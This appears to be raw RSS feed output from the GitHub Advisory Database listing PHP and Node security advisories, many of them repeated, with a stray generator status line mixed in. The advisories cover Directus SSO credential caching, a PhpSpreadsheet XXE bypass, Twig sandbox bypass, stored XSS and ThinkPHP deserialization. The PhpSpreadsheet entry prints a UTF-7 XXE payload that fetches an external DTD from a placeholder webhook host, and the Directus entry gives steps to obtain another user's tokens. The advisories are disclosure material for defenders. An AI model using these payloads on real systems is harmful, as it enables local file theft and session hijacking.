<guid isPermaLink="false">https://github.com/advisories/GHSA-9wv6-86v2-598j</guid>
<author>GitHub</author>
</item>
<item>
<title>[@directus/api] Session is cached for OpenID and OAuth2 if `redirect` is not used</title>
<description><h3 id="summary">Summary</h3>
<p>Unauthenticated user can access credentials of last authenticated user via OpenID or OAuth2 where the authentication URL did not include <code>redirect</code> query string.</p>
<p>For example:</p>
<ul>
<li>Project is configured with OpenID or OAuth2</li>
<li>Project is configured with cache enabled</li>
<li>User tries to login via SSO link, but without <code>redirect</code> query string</li>
<li>After successful login, credentials are cached</li>
<li>If an unauthenticated user tries to login via SSO link, it will return the credentials of the other last user</li>
</ul>
<p>The SSO link is something like <code>https://directus.example.com/auth/login/openid/callback</code>, where <code>openid</code> is the name of the OpenID provider configured in Directus</p>
<h3 id="details">Details</h3>
<p>This happens because on that endpoint for both OpenId and Oauth2 Directus is using the <code>respond</code> middleware, which by default will try to cache GET requests that met some conditions. Although, those conditions do not include this scenario, when an unauthenticated request returns user credentials.
For OpenID, this can be seen here:
<a href="https://github.com/directus/directus/blob/main/api/src/auth/drivers/openid.ts#L453-L459">https://github.com/directus/directus/blob/main/api/src/auth/drivers/openid.ts#L453-L459</a>
And for OAuth2 can be seen here
<a href="https://github.com/directus/directus/blob/main/api/src/auth/drivers/oauth2.ts#L422-L428">https://github.com/directus/directus/blob/main/api/src/auth/drivers/oauth2.ts#L422-L428</a></p>
<h3 id="poc">PoC</h3>
<ul>
<li>Create a new Directus project</li>
<li>Set <code>CACHE_ENABLED</code> to true</li>
<li>Set <code>CACHE_STORE</code> to <code>redis</code> for reliable results (if using memory with multiple nodes, it may only happen sometimes, due to cache being different for different nodes)</li>
<li>Configure <code>REDIS</code> with redis string or redis host, port, user, etc.</li>
<li>Set <code>AUTH_PROVIDERS</code> to <code>openid</code></li>
<li>Set <code>PUBLIC_URL</code> to the the main URL of your project . For example, <code>PUBLIC_URL: http://localhost:8055</code></li>
<li>Configure <code>AUTH_OPENID_CLIENT_ID</code>, <code>AUTH_OPENID_CLIENT_SECRET</code>, <code>AUTH_OPENID_ISSUER_URL</code> with proper OpenID configurations</li>
<li>Be sure that on OpenID external app you have configured Redirect URI to <code>http://localhost:8055/auth/login/openid/callback</code></li>
<li>Run Directus</li>
<li>Open the SSO link like <code>http://localhost:8055/auth/login/openid/callback</code></li>
<li>Do the authentication on the OpenID external webpage</li>
<li>Verify that it you got redirected to a page with a JSON including <code>access_token</code> property</li>
<li>Be sure all anonymous mode windows are closed</li>
<li>Open an anonymous window and go to the SSO Link <code>http://localhost:8055/auth/login/openid/callback</code> and see you have the same credentials, even though you don't have any session because you are in anonymous mode</li>
</ul>
<h3 id="impact">Impact</h3>
<p>All projects using OpenID or OAuth 2, that does not include <code>redirect</code> query string on loggin in users.</p>
<h3 id="references">References</h3>
<ul>
<li><a href="https://github.com/directus/directus/security/advisories/GHSA-cff8-x7jv-4fm8">https://github.com/directus/directus/security/advisories/GHSA-cff8-x7jv-4fm8</a></li>
<li><a href="https://github.com/directus/directus/commit/4aace0bbe57232e38cd6a287ee475293e46dc91b">https://github.com/directus/directus/commit/4aace0bbe57232e38cd6a287ee475293e46dc91b</a></li>
<li><a href="https://github.com/directus/directus/commit/769fa22797bff5a9231599883b391e013f122e52">https://github.com/directus/directus/commit/769fa22797bff5a9231599883b391e013f122e52</a></li>
<li><a href="https://github.com/directus/directus/blob/main/api/src/auth/drivers/oauth2.ts#L422-L428">https://github.com/directus/directus/blob/main/api/src/auth/drivers/oauth2.ts#L422-L428</a></li>
<li><a href="https://github.com/directus/directus/blob/main/api/src/auth/drivers/openid.ts#L453-L459">https://github.com/directus/directus/blob/main/api/src/auth/drivers/openid.ts#L453-L459</a></li>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-45596">https://nvd.nist.gov/vuln/detail/CVE-2024-45596</a></li>
<li><a href="https://github.com/advisories/GHSA-cff8-x7jv-4fm8">https://github.com/advisories/GHSA-cff8-x7jv-4fm8</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-cff8-x7jv-4fm8</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-cff8-x7jv-4fm8</guid>
<author>GitHub</author>
</item>
<item>
<title>[@directus/api] Session is cached for OpenID and OAuth2 if `redirect` is not used</title>
<description><h3 id="summary">Summary</h3>
<p>Unauthenticated user can access credentials of last authenticated user via OpenID or OAuth2 where the authentication URL did not include <code>redirect</code> query string.</p>
<p>For example:</p>
<ul>
<li>Project is configured with OpenID or OAuth2</li>
<li>Project is configured with cache enabled</li>
<li>User tries to login via SSO link, but without <code>redirect</code> query string</li>
<li>After successful login, credentials are cached</li>
<li>If an unauthenticated user tries to login via SSO link, it will return the credentials of the other last user</li>
</ul>
<p>The SSO link is something like <code>https://directus.example.com/auth/login/openid/callback</code>, where <code>openid</code> is the name of the OpenID provider configured in Directus</p>
<h3 id="details">Details</h3>
<p>This happens because on that endpoint for both OpenId and Oauth2 Directus is using the <code>respond</code> middleware, which by default will try to cache GET requests that met some conditions. Although, those conditions do not include this scenario, when an unauthenticated request returns user credentials.
For OpenID, this can be seen here:
<a href="https://github.com/directus/directus/blob/main/api/src/auth/drivers/openid.ts#L453-L459">https://github.com/directus/directus/blob/main/api/src/auth/drivers/openid.ts#L453-L459</a>
And for OAuth2 can be seen here
<a href="https://github.com/directus/directus/blob/main/api/src/auth/drivers/oauth2.ts#L422-L428">https://github.com/directus/directus/blob/main/api/src/auth/drivers/oauth2.ts#L422-L428</a></p>
<h3 id="poc">PoC</h3>
<ul>
<li>Create a new Directus project</li>
<li>Set <code>CACHE_ENABLED</code> to true</li>
<li>Set <code>CACHE_STORE</code> to <code>redis</code> for reliable results (if using memory with multiple nodes, it may only happen sometimes, due to cache being different for different nodes)</li>
<li>Configure <code>REDIS</code> with redis string or redis host, port, user, etc.</li>
<li>Set <code>AUTH_PROVIDERS</code> to <code>openid</code></li>
<li>Set <code>PUBLIC_URL</code> to the the main URL of your project . For example, <code>PUBLIC_URL: http://localhost:8055</code></li>
<li>Configure <code>AUTH_OPENID_CLIENT_ID</code>, <code>AUTH_OPENID_CLIENT_SECRET</code>, <code>AUTH_OPENID_ISSUER_URL</code> with proper OpenID configurations</li>
<li>Be sure that on OpenID external app you have configured Redirect URI to <code>http://localhost:8055/auth/login/openid/callback</code></li>
<li>Run Directus</li>
<li>Open the SSO link like <code>http://localhost:8055/auth/login/openid/callback</code></li>
<li>Do the authentication on the OpenID external webpage</li>
<li>Verify that it you got redirected to a page with a JSON including <code>access_token</code> property</li>
<li>Be sure all anonymous mode windows are closed</li>
<li>Open an anonymous window and go to the SSO Link <code>http://localhost:8055/auth/login/openid/callback</code> and see you have the same credentials, even though you don't have any session because you are in anonymous mode</li>
</ul>
<h3 id="impact">Impact</h3>
<p>All projects using OpenID or OAuth 2, that does not include <code>redirect</code> query string on loggin in users.</p>
<h3 id="references">References</h3>
<ul>
<li><a href="https://github.com/directus/directus/security/advisories/GHSA-cff8-x7jv-4fm8">https://github.com/directus/directus/security/advisories/GHSA-cff8-x7jv-4fm8</a></li>
<li><a href="https://github.com/directus/directus/commit/4aace0bbe57232e38cd6a287ee475293e46dc91b">https://github.com/directus/directus/commit/4aace0bbe57232e38cd6a287ee475293e46dc91b</a></li>
<li><a href="https://github.com/directus/directus/commit/769fa22797bff5a9231599883b391e013f122e52">https://github.com/directus/directus/commit/769fa22797bff5a9231599883b391e013f122e52</a></li>
<li><a href="https://github.com/directus/directus/blob/main/api/src/auth/drivers/oauth2.ts#L422-L428">https://github.com/directus/directus/blob/main/api/src/auth/drivers/oauth2.ts#L422-L428</a></li>
<li><a href="https://github.com/directus/directus/blob/main/api/src/auth/drivers/openid.ts#L453-L459">https://github.com/directus/directus/blob/main/api/src/auth/drivers/openid.ts#L453-L459</a></li>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-45596">https://nvd.nist.gov/vuln/detail/CVE-2024-45596</a></li>
<li><a href="https://github.com/advisories/GHSA-cff8-x7jv-4fm8">https://github.com/advisories/GHSA-cff8-x7jv-4fm8</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-cff8-x7jv-4fm8</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-cff8-x7jv-4fm8</guid>
<author>GitHub</author>
</item>
<item>
<title>[directus] Session is cached for OpenID and OAuth2 if `redirect` is not used</title>
<description><h3 id="summary">Summary</h3>
<p>Unauthenticated user can access credentials of last authenticated user via OpenID or OAuth2 where the authentication URL did not include <code>redirect</code> query string.</p>
<p>For example:</p>
<ul>
<li>Project is configured with OpenID or OAuth2</li>
<li>Project is configured with cache enabled</li>
<li>User tries to login via SSO link, but without <code>redirect</code> query string</li>
<li>After successful login, credentials are cached</li>
<li>If an unauthenticated user tries to login via SSO link, it will return the credentials of the other last user</li>
</ul>
<p>The SSO link is something like <code>https://directus.example.com/auth/login/openid/callback</code>, where <code>openid</code> is the name of the OpenID provider configured in Directus</p>
<h3 id="details">Details</h3>
<p>This happens because on that endpoint for both OpenId and Oauth2 Directus is using the <code>respond</code> middleware, which by default will try to cache GET requests that met some conditions. Although, those conditions do not include this scenario, when an unauthenticated request returns user credentials.
For OpenID, this can be seen here:
<a href="https://github.com/directus/directus/blob/main/api/src/auth/drivers/openid.ts#L453-L459">https://github.com/directus/directus/blob/main/api/src/auth/drivers/openid.ts#L453-L459</a>
And for OAuth2 can be seen here
<a href="https://github.com/directus/directus/blob/main/api/src/auth/drivers/oauth2.ts#L422-L428">https://github.com/directus/directus/blob/main/api/src/auth/drivers/oauth2.ts#L422-L428</a></p>
<h3 id="poc">PoC</h3>
<ul>
<li>Create a new Directus project</li>
<li>Set <code>CACHE_ENABLED</code> to true</li>
<li>Set <code>CACHE_STORE</code> to <code>redis</code> for reliable results (if using memory with multiple nodes, it may only happen sometimes, due to cache being different for different nodes)</li>
<li>Configure <code>REDIS</code> with redis string or redis host, port, user, etc.</li>
<li>Set <code>AUTH_PROVIDERS</code> to <code>openid</code></li>
<li>Set <code>PUBLIC_URL</code> to the the main URL of your project . For example, <code>PUBLIC_URL: http://localhost:8055</code></li>
<li>Configure <code>AUTH_OPENID_CLIENT_ID</code>, <code>AUTH_OPENID_CLIENT_SECRET</code>, <code>AUTH_OPENID_ISSUER_URL</code> with proper OpenID configurations</li>
<li>Be sure that on OpenID external app you have configured Redirect URI to <code>http://localhost:8055/auth/login/openid/callback</code></li>
<li>Run Directus</li>
<li>Open the SSO link like <code>http://localhost:8055/auth/login/openid/callback</code></li>
<li>Do the authentication on the OpenID external webpage</li>
<li>Verify that it you got redirected to a page with a JSON including <code>access_token</code> property</li>
<li>Be sure all anonymous mode windows are closed</li>
<li>Open an anonymous window and go to the SSO Link <code>http://localhost:8055/auth/login/openid/callback</code> and see you have the same credentials, even though you don't have any session because you are in anonymous mode</li>
</ul>
<h3 id="impact">Impact</h3>
<p>All projects using OpenID or OAuth 2, that does not include <code>redirect</code> query string on loggin in users.</p>
<h3 id="references">References</h3>
<ul>
<li><a href="https://github.com/directus/directus/security/advisories/GHSA-cff8-x7jv-4fm8">https://github.com/directus/directus/security/advisories/GHSA-cff8-x7jv-4fm8</a></li>
<li><a href="https://github.com/directus/directus/commit/4aace0bbe57232e38cd6a287ee475293e46dc91b">https://github.com/directus/directus/commit/4aace0bbe57232e38cd6a287ee475293e46dc91b</a></li>
<li><a href="https://github.com/directus/directus/commit/769fa22797bff5a9231599883b391e013f122e52">https://github.com/directus/directus/commit/769fa22797bff5a9231599883b391e013f122e52</a></li>
<li><a href="https://github.com/directus/directus/blob/main/api/src/auth/drivers/oauth2.ts#L422-L428">https://github.com/directus/directus/blob/main/api/src/auth/drivers/oauth2.ts#L422-L428</a></li>
<li><a href="https://github.com/directus/directus/blob/main/api/src/auth/drivers/openid.ts#L453-L459">https://github.com/directus/directus/blob/main/api/src/auth/drivers/openid.ts#L453-L459</a></li>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-45596">https://nvd.nist.gov/vuln/detail/CVE-2024-45596</a></li>
<li><a href="https://github.com/advisories/GHSA-cff8... |
|
Successfully generated as following: http://localhost:1200/github-advisor/data - Success ✔️<?xml version="1.0" encoding="UTF-8"?>
<rss xmlns:atom="http://www.w3.org/2005/Atom" version="2.0">
<channel>
<title>GitHub Advisory Database RSS - composer</title>
<link>https://github.com/advisories</link>
<atom:link href="http://localhost:1200/github-advisor/data" rel="self" type="application/rss+xml"></atom:link>
<description>GitHub Advisory Database RSS - composer - Powered by RSSHub</description>
<generator>RSSHub</generator>
<webMaster>contact@rsshub.app (RSSHub)</webMaster>
<language>en</language>
<lastBuildDate>Fri, 13 Sep 2024 16:32:36 GMT</lastBuildDate>
<ttl>5</ttl>
<item>
<title>[phpoffice/phpspreadsheet] XXE in PHPSpreadsheet encoding is returned</title>
<description><h3 id="summary">Summary</h3>
<p>Bypassing the filter allows a XXE-attack. Which is turn allows attacker to obtain contents of local files, even if error reporting muted by @ symbol. (LFI-attack) </p>
<h3 id="details">Details</h3>
<p>Check <code> $pattern = '/encoding="(.*?)"/';</code> easy to bypass. Just use a single quote symbol <code>'</code>. So payload looks like this:</p>
<pre><code>&lt;?xml version="1.0" encoding='UTF-7' standalone="yes"?&gt;
+ADw-!DOCTYPE xxe [+ADw-!ENTITY % xxe SYSTEM "http://example.com/file.dtd"&gt; %xxe;]&gt;
</code></pre>
<p>If you add this header to any XML file into xlsx-formatted file, such as sharedStrings.xml file, then xxe will execute. </p>
<h3 id="poc">PoC</h3>
<ol>
<li>Create simple xlsx file</li>
<li>Rename xlsx to zip</li>
<li>Go to the zip and open the <code>xl/sharedStrings.xml</code> file in edit mode.</li>
<li>Replace <code>&lt;?xml version="1.0" encoding="UTF-8" standalone="yes"?&gt;</code> to</li>
</ol>
<pre><code>&lt;?xml version="1.0" encoding='UTF-7' standalone="yes"?&gt;
+ADw-!DOCTYPE xxe [+ADw-!ENTITY % xxe SYSTEM "http://%webhook%/file.dtd"&gt; %xxe;]&gt;
</code></pre>
<ol start="5">
<li>Save <code>sharedStrings.xml</code> file and rename zip back to xlsx.</li>
<li>Use minimal php code that simply opens this xlsx file:</li>
</ol>
<pre><code>use PhpOffice\PhpSpreadsheet\IOFactory;
require __DIR__ . '/vendor/autoload.php';
$spreadsheet = IOFactory::load("file.xlsx");
</code></pre>
<ol start="7">
<li>You will receive the request to your <code>http://%webhook%/file.dtd</code></li>
<li>Dont't forget that you can use php-wrappers into xxe, some php:// wrapper payload allows fetch local files.</li>
</ol>
<h3 id="impact">Impact</h3>
<p>Read local files
<img alt="lfi" src="https://github.com/PHPOffice/PhpSpreadsheet/assets/95242087/1839cddb-6bb0-486d-8884-9ac485776931" referrerpolicy="no-referrer"></p>
<h3 id="references">References</h3>
<ul>
<li><a href="https://github.com/PHPOffice/PhpSpreadsheet/security/advisories/GHSA-ghg6-32f9-2jp7">https://github.com/PHPOffice/PhpSpreadsheet/security/advisories/GHSA-ghg6-32f9-2jp7</a></li>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-45048">https://nvd.nist.gov/vuln/detail/CVE-2024-45048</a></li>
<li><a href="https://github.com/PHPOffice/PhpSpreadsheet/commit/bea2d4b30f24bcc8a7712e208d1359e603b45dda">https://github.com/PHPOffice/PhpSpreadsheet/commit/bea2d4b30f24bcc8a7712e208d1359e603b45dda</a></li>
<li><a href="https://github.com/advisories/GHSA-ghg6-32f9-2jp7">https://github.com/advisories/GHSA-ghg6-32f9-2jp7</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-ghg6-32f9-2jp7</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-ghg6-32f9-2jp7</guid>
<author>GitHub</author>
</item>
<item>
<title>[phpoffice/phpspreadsheet] XXE in PHPSpreadsheet encoding is returned</title>
<description><h3 id="summary">Summary</h3>
<p>Bypassing the filter allows a XXE-attack. Which is turn allows attacker to obtain contents of local files, even if error reporting muted by @ symbol. (LFI-attack) </p>
<h3 id="details">Details</h3>
<p>Check <code> $pattern = '/encoding="(.*?)"/';</code> easy to bypass. Just use a single quote symbol <code>'</code>. So payload looks like this:</p>
<pre><code>&lt;?xml version="1.0" encoding='UTF-7' standalone="yes"?&gt;
+ADw-!DOCTYPE xxe [+ADw-!ENTITY % xxe SYSTEM "http://example.com/file.dtd"&gt; %xxe;]&gt;
</code></pre>
<p>If you add this header to any XML file into xlsx-formatted file, such as sharedStrings.xml file, then xxe will execute. </p>
<h3 id="poc">PoC</h3>
<ol>
<li>Create simple xlsx file</li>
<li>Rename xlsx to zip</li>
<li>Go to the zip and open the <code>xl/sharedStrings.xml</code> file in edit mode.</li>
<li>Replace <code>&lt;?xml version="1.0" encoding="UTF-8" standalone="yes"?&gt;</code> to</li>
</ol>
<pre><code>&lt;?xml version="1.0" encoding='UTF-7' standalone="yes"?&gt;
+ADw-!DOCTYPE xxe [+ADw-!ENTITY % xxe SYSTEM "http://%webhook%/file.dtd"&gt; %xxe;]&gt;
</code></pre>
<ol start="5">
<li>Save <code>sharedStrings.xml</code> file and rename zip back to xlsx.</li>
<li>Use minimal php code that simply opens this xlsx file:</li>
</ol>
<pre><code>use PhpOffice\PhpSpreadsheet\IOFactory;
require __DIR__ . '/vendor/autoload.php';
$spreadsheet = IOFactory::load("file.xlsx");
</code></pre>
<ol start="7">
<li>You will receive the request to your <code>http://%webhook%/file.dtd</code></li>
<li>Dont't forget that you can use php-wrappers into xxe, some php:// wrapper payload allows fetch local files.</li>
</ol>
<h3 id="impact">Impact</h3>
<p>Read local files
<img alt="lfi" src="https://github.com/PHPOffice/PhpSpreadsheet/assets/95242087/1839cddb-6bb0-486d-8884-9ac485776931" referrerpolicy="no-referrer"></p>
<h3 id="references">References</h3>
<ul>
<li><a href="https://github.com/PHPOffice/PhpSpreadsheet/security/advisories/GHSA-ghg6-32f9-2jp7">https://github.com/PHPOffice/PhpSpreadsheet/security/advisories/GHSA-ghg6-32f9-2jp7</a></li>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-45048">https://nvd.nist.gov/vuln/detail/CVE-2024-45048</a></li>
<li><a href="https://github.com/PHPOffice/PhpSpreadsheet/commit/bea2d4b30f24bcc8a7712e208d1359e603b45dda">https://github.com/PHPOffice/PhpSpreadsheet/commit/bea2d4b30f24bcc8a7712e208d1359e603b45dda</a></li>
<li><a href="https://github.com/advisories/GHSA-ghg6-32f9-2jp7">https://github.com/advisories/GHSA-ghg6-32f9-2jp7</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-ghg6-32f9-2jp7</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-ghg6-32f9-2jp7</guid>
<author>GitHub</author>
</item>
<item>
<title>[twig/twig] Twig has a possible sandbox bypass</title>
<description><h3 id="description">Description</h3>
<p>Under some circumstances, the sandbox security checks are not run which allows user-contributed templates to bypass the sandbox restrictions.</p>
<p>The security issue happens when all these conditions are met:</p>
<ul>
<li>The sandbox is disabled globally;</li>
<li>The sandbox is enabled via a sandboxed <code>include()</code> function which references a template name (like <code>included.twig</code>) and not a <code>Template</code> or <code>TemplateWrapper</code> instance;</li>
<li>The included template has been loaded before the <code>include()</code> call but in a non-sandbox context (possible as the sandbox has been globally disabled).</li>
</ul>
<h3 id="resolution">Resolution</h3>
<p>The patch ensures that the sandbox security checks are always run at runtime.</p>
<h3 id="credits">Credits</h3>
<p>We would like to thank Fabien Potencier for reporting and fixing the issue.</p>
<h3 id="references">References</h3>
<ul>
<li><a href="https://github.com/twigphp/Twig/security/advisories/GHSA-6j75-5wfj-gh66">https://github.com/twigphp/Twig/security/advisories/GHSA-6j75-5wfj-gh66</a></li>
<li><a href="https://github.com/twigphp/Twig/commit/11f68e2aeb526bfaf638e30d4420d8a710f3f7c6">https://github.com/twigphp/Twig/commit/11f68e2aeb526bfaf638e30d4420d8a710f3f7c6</a></li>
<li><a href="https://github.com/twigphp/Twig/commit/2102dd135986db79192d26fb5f5817a566e0a7de">https://github.com/twigphp/Twig/commit/2102dd135986db79192d26fb5f5817a566e0a7de</a></li>
<li><a href="https://github.com/twigphp/Twig/commit/7afa198603de49d147e90d18062e7b9addcf5233">https://github.com/twigphp/Twig/commit/7afa198603de49d147e90d18062e7b9addcf5233</a></li>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-45411">https://nvd.nist.gov/vuln/detail/CVE-2024-45411</a></li>
<li><a href="https://github.com/twigphp/Twig/commit/41103dcdc2daab4c83cdd05b5b4fde5b7e41e635">https://github.com/twigphp/Twig/commit/41103dcdc2daab4c83cdd05b5b4fde5b7e41e635</a></li>
<li><a href="https://github.com/advisories/GHSA-6j75-5wfj-gh66">https://github.com/advisories/GHSA-6j75-5wfj-gh66</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-6j75-5wfj-gh66</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-6j75-5wfj-gh66</guid>
<author>GitHub</author>
</item>
<item>
<title>[twig/twig] Twig has a possible sandbox bypass</title>
<description><h3 id="description">Description</h3>
<p>Under some circumstances, the sandbox security checks are not run which allows user-contributed templates to bypass the sandbox restrictions.</p>
<p>The security issue happens when all these conditions are met:</p>
<ul>
<li>The sandbox is disabled globally;</li>
<li>The sandbox is enabled via a sandboxed <code>include()</code> function which references a template name (like <code>included.twig</code>) and not a <code>Template</code> or <code>TemplateWrapper</code> instance;</li>
<li>The included template has been loaded before the <code>include()</code> call but in a non-sandbox context (possible as the sandbox has been globally disabled).</li>
</ul>
<h3 id="resolution">Resolution</h3>
<p>The patch ensures that the sandbox security checks are always run at runtime.</p>
<h3 id="credits">Credits</h3>
<p>We would like to thank Fabien Potencier for reporting and fixing the issue.</p>
<h3 id="references">References</h3>
<ul>
<li><a href="https://github.com/twigphp/Twig/security/advisories/GHSA-6j75-5wfj-gh66">https://github.com/twigphp/Twig/security/advisories/GHSA-6j75-5wfj-gh66</a></li>
<li><a href="https://github.com/twigphp/Twig/commit/11f68e2aeb526bfaf638e30d4420d8a710f3f7c6">https://github.com/twigphp/Twig/commit/11f68e2aeb526bfaf638e30d4420d8a710f3f7c6</a></li>
<li><a href="https://github.com/twigphp/Twig/commit/2102dd135986db79192d26fb5f5817a566e0a7de">https://github.com/twigphp/Twig/commit/2102dd135986db79192d26fb5f5817a566e0a7de</a></li>
<li><a href="https://github.com/twigphp/Twig/commit/7afa198603de49d147e90d18062e7b9addcf5233">https://github.com/twigphp/Twig/commit/7afa198603de49d147e90d18062e7b9addcf5233</a></li>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-45411">https://nvd.nist.gov/vuln/detail/CVE-2024-45411</a></li>
<li><a href="https://github.com/twigphp/Twig/commit/41103dcdc2daab4c83cdd05b5b4fde5b7e41e635">https://github.com/twigphp/Twig/commit/41103dcdc2daab4c83cdd05b5b4fde5b7e41e635</a></li>
<li><a href="https://github.com/advisories/GHSA-6j75-5wfj-gh66">https://github.com/advisories/GHSA-6j75-5wfj-gh66</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-6j75-5wfj-gh66</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-6j75-5wfj-gh66</guid>
<author>GitHub</author>
</item>
<item>
<title>[damienharper/auditor-bundle] auditor-bundle vulnerable to Cross-site Scripting because name of entity does not get escaped</title>
<description><h3 id="summary">Summary</h3>
<p>Unescaped entity property enables Javascript injection.</p>
<h3 id="details">Details</h3>
<p>I think this is possible because %source_label% in twig macro is not escaped. Therefore script tags can be inserted and are executed.</p>
<h3 id="poc">PoC</h3>
<ul>
<li>clone example project <a href="https://github.com/DamienHarper/auditor-bundle-demo">https://github.com/DamienHarper/auditor-bundle-demo</a></li>
<li>create author with FullName </li>
<li>delete author</li>
<li>view audit of authors</li>
<li>alert is displayed</li>
</ul>
<h3 id="impact">Impact</h3>
<p>persistent XSS. JS can be injected and executed.</p>
<h3 id="references">References</h3>
<ul>
<li><a href="https://github.com/DamienHarper/auditor-bundle/security/advisories/GHSA-78vg-7v27-hj67">https://github.com/DamienHarper/auditor-bundle/security/advisories/GHSA-78vg-7v27-hj67</a></li>
<li><a href="https://github.com/DamienHarper/auditor-bundle/commit/42ba2940d8b99467de0c806ea5655cc1c6882cd1">https://github.com/DamienHarper/auditor-bundle/commit/42ba2940d8b99467de0c806ea5655cc1c6882cd1</a></li>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-45592">https://nvd.nist.gov/vuln/detail/CVE-2024-45592</a></li>
<li><a href="https://github.com/advisories/GHSA-78vg-7v27-hj67">https://github.com/advisories/GHSA-78vg-7v27-hj67</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-78vg-7v27-hj67</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-78vg-7v27-hj67</guid>
<author>GitHub</author>
</item>
<item>
<title>[topthink/framework] ThinkPHP deserialization vulnerability</title>
<description><p>A deserialization vulnerability in Thinkphp v6.1.3 to v8.0.4 allows attackers to execute arbitrary code.</p>
<h3 id="references">References</h3>
<ul>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-44902">https://nvd.nist.gov/vuln/detail/CVE-2024-44902</a></li>
<li><a href="https://github.com/fru1ts/CVE-2024-44902">https://github.com/fru1ts/CVE-2024-44902</a></li>
<li><a href="http://thinkphp.com/">http://thinkphp.com</a></li>
<li><a href="https://github.com/advisories/GHSA-f4wh-359g-4pq7">https://github.com/advisories/GHSA-f4wh-359g-4pq7</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-f4wh-359g-4pq7</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-f4wh-359g-4pq7</guid>
<author>GitHub</author>
</item>
<item>
<title>[twig/twig] Twig has a possible sandbox bypass</title>
<description><h3 id="description">Description</h3>
<p>Under some circumstances, the sandbox security checks are not run which allows user-contributed templates to bypass the sandbox restrictions.</p>
<p>The security issue happens when all these conditions are met:</p>
<ul>
<li>The sandbox is disabled globally;</li>
<li>The sandbox is enabled via a sandboxed <code>include()</code> function which references a template name (like <code>included.twig</code>) and not a <code>Template</code> or <code>TemplateWrapper</code> instance;</li>
<li>The included template has been loaded before the <code>include()</code> call but in a non-sandbox context (possible as the sandbox has been globally disabled).</li>
</ul>
<h3 id="resolution">Resolution</h3>
<p>The patch ensures that the sandbox security checks are always run at runtime.</p>
<h3 id="credits">Credits</h3>
<p>We would like to thank Fabien Potencier for reporting and fixing the issue.</p>
<h3 id="references">References</h3>
<ul>
<li><a href="https://github.com/twigphp/Twig/security/advisories/GHSA-6j75-5wfj-gh66">https://github.com/twigphp/Twig/security/advisories/GHSA-6j75-5wfj-gh66</a></li>
<li><a href="https://github.com/twigphp/Twig/commit/11f68e2aeb526bfaf638e30d4420d8a710f3f7c6">https://github.com/twigphp/Twig/commit/11f68e2aeb526bfaf638e30d4420d8a710f3f7c6</a></li>
<li><a href="https://github.com/twigphp/Twig/commit/2102dd135986db79192d26fb5f5817a566e0a7de">https://github.com/twigphp/Twig/commit/2102dd135986db79192d26fb5f5817a566e0a7de</a></li>
<li><a href="https://github.com/twigphp/Twig/commit/7afa198603de49d147e90d18062e7b9addcf5233">https://github.com/twigphp/Twig/commit/7afa198603de49d147e90d18062e7b9addcf5233</a></li>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-45411">https://nvd.nist.gov/vuln/detail/CVE-2024-45411</a></li>
<li><a href="https://github.com/twigphp/Twig/commit/41103dcdc2daab4c83cdd05b5b4fde5b7e41e635">https://github.com/twigphp/Twig/commit/41103dcdc2daab4c83cdd05b5b4fde5b7e41e635</a></li>
<li><a href="https://github.com/advisories/GHSA-6j75-5wfj-gh66">https://github.com/advisories/GHSA-6j75-5wfj-gh66</a></li>
</ul>
</description>
<link>https://github.com/advisories/GHSA-6j75-5wfj-gh66</link>
<guid isPermaLink="false">https://github.com/advisories/GHSA-6j75-5wfj-gh66</guid>
<author>GitHub</author>
</item>
<item>
<title>[twig/twig] Twig has a possible sandbox bypass</title>
<description><h3 id="description">Description</h3>
<p>Under some circumstances, the sandbox security checks are not run which allows user-contributed templates to bypass the sandbox restrictions.</p>
<p>The security issue happens when all these conditions are met:</p>
<ul>
<li>The sandbox is disabled globally;</li>
<li>The sandbox is enabled via a sandboxed <code>include()</code> function which references a template name (like <code>included.twig</code>) and not a <code>Template</code> or <code>TemplateWrapper</code> instance;</li>
<li>The included template has been loaded before the <code>include()</code> call but in a non-sandbox context (possible as the sandbox has been globally disabled).</li>
</ul>
<h3 id="resolution">Resolution</h3>
<p>The patch ensures that the sandbox security checks are always run at runtime.</p>
<h3 id="credits">Credits</h3>
<p>We would like to thank Fabien Potencier for reporting and fixing the issue.</p>
<h3 id="references">References</h3>
<ul>
<li><a href="https://github.com/twigphp/Twig/security/advisories/GHSA-6j75-5wfj-gh66">https://github.com/twigphp/Twig/security/advisories/GHSA-6j75-5wfj-gh66</a></li>
<li><a href="https://github.com/twigphp/Twig/commit/11f68e2aeb526bfaf638e30d4420d8a710f3f7c6">https://github.com/twigphp/Twig/commit/11f68e2aeb526bfaf638e30d4420d8a710f3f7c6</a></li>
<li><a href="https://github.com/twigphp/Twig/commit/2102dd135986db79192d26fb5f5817a566e0a7de">https://github.com/twigphp/Twig/commit/2102dd135986db79192d26fb5f5817a566e0a7de</a></li>
<li><a href="https://github.com/twigphp/Twig/commit/7afa198603de49d147e90d18062e7b9addcf5233">https://github.com/twigphp/Twig/commit/7afa198603de49d147e90d18062e7b9addcf5233</a></li>
<li><a href="https://nvd.nist.gov/vuln/detail/CVE-2024-45411">https://nvd.nist.gov/vuln/detail/CVE-2024-45411</a></li>
